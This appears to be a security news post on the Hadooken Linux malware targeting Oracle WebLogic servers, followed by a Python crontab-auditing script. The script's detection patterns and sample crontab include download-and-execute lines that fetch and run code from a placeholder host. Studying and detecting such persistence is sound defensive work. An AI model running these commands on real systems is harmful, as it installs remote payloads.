Server Attacked, Risk of Information Leak | System Square
September 9, 2024

New Linux malware Hadooken targets Oracle WebLogic servers

Aqua Security’s Nautilus research team recently reported the emergence of a new Linux malware called Hadooken. This malware specifically targets Oracle WebLogic servers to deploy additional malicious software and extract credentials for lateral movement within compromised networks.
The Hadooken malware is disseminated through attacks that exploit vulnerabilities associated with weak passwords to gain initial access. Once attackers infiltrate a WebLogic server, they download a shell script and a Python script, both of which are specifically designed to retrieve and execute the malware. The dual use of these scripts indicates a strategic approach to ensuring successful execution on the compromised server.
These scripts download the malware into a temporary directory and remove it after execution. Further analysis shows that the shell script systematically iterates through directories containing Secure Shell (SSH) data and uses the collected information to identify and attack known servers, enabling lateral movement within the network. This propagation mechanism lets Hadooken spread throughout the organization’s network and associated environments. The attackers also clear logs to obfuscate their actions.

Upon execution, Hadooken deploys two distinct files: a crypto-miner that is written to three different paths under different names, and the Tsunami malware, which is stored in a temporary folder under a randomly generated name. While there is currently no evidence that the attackers actively use Tsunami during this phase of the attack, Aqua Security notes that it may be used in later stages. To ensure persistence, the malware creates multiple cron jobs, each with a distinct name, execution frequency, and script directory.

The investigation also identified two IP addresses associated with downloading the Hadooken malware. One, registered in Germany, has previously been linked to cybercrime groups such as TeamTNT and Gang 8220. The second, registered in Russia, was found to be inactive.
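A defender-side check for the persistence pattern described above (several cron entries running staged scripts from temporary directories, downloading and executing a payload, then deleting it). This is an added example, not code from the report or from Aqua Security; the temp-directory list, the regexes and the sample crontab are all assumptions constructed for illustration.

```python
import re

# Assumed staging locations and patterns (not taken from the report).
TEMP_DIR = re.compile(r"(?<![\w/])(/tmp|/var/tmp|/dev/shm)/")
FETCH_EXEC = re.compile(r"\b(?:curl|wget)\b[^|&;]*(?:\|\s*|&&\s*)(?:ba)?sh\b")
CRON_ENTRY = re.compile(r"^(?P<sched>(?:\S+\s+){5})(?P<cmd>\S.*)$")
SELF_DELETE = re.compile(r"\brm\s+(?:-\w+\s+)*(?:/tmp|/var/tmp|/dev/shm)/")

def parse_crontab(text):
    """Yield (schedule, command) for each five-field crontab entry."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment or VAR=value line
        m = CRON_ENTRY.match(line)
        if m:
            yield m.group("sched").strip(), m.group("cmd").strip()

def audit_crontab(text):
    """Return (schedule, command, reasons) for each suspicious entry."""
    findings = []
    for sched, cmd in parse_crontab(text):
        reasons = []
        if TEMP_DIR.search(cmd):
            reasons.append("runs from temp directory")
        if FETCH_EXEC.search(cmd):
            reasons.append("download-and-execute")
        if SELF_DELETE.search(cmd):
            reasons.append("deletes staged file")
        if reasons:
            findings.append((sched, cmd, reasons))
    return findings

def persistence_spread(findings):
    """How many distinct schedules and temp directories the findings span."""
    scheds = {sched for sched, _, _ in findings}
    dirs = {d for _, cmd, _ in findings for d in TEMP_DIR.findall(cmd)}
    return len(scheds), len(dirs)

# Constructed sample crontab; the hosts and paths are placeholders, not IoCs.
SAMPLE = """\
# m h dom mon dow command
MAILTO=""
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * /tmp/.x/run.sh
0 * * * * wget -q http://example.invalid/c -O /var/tmp/c && sh /var/tmp/c; rm -f /var/tmp/c
*/15 * * * * curl -s http://example.invalid/s | sh
"""
```

On the sample, `audit_crontab(SAMPLE)` flags three of the four entries and `persistence_spread` reports three distinct schedules across two temp directories, the multi-job spread the report describes; feed it the contents of `/etc/crontab`, `/etc/cron.d/*` or `crontab -l` output on a host under review.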
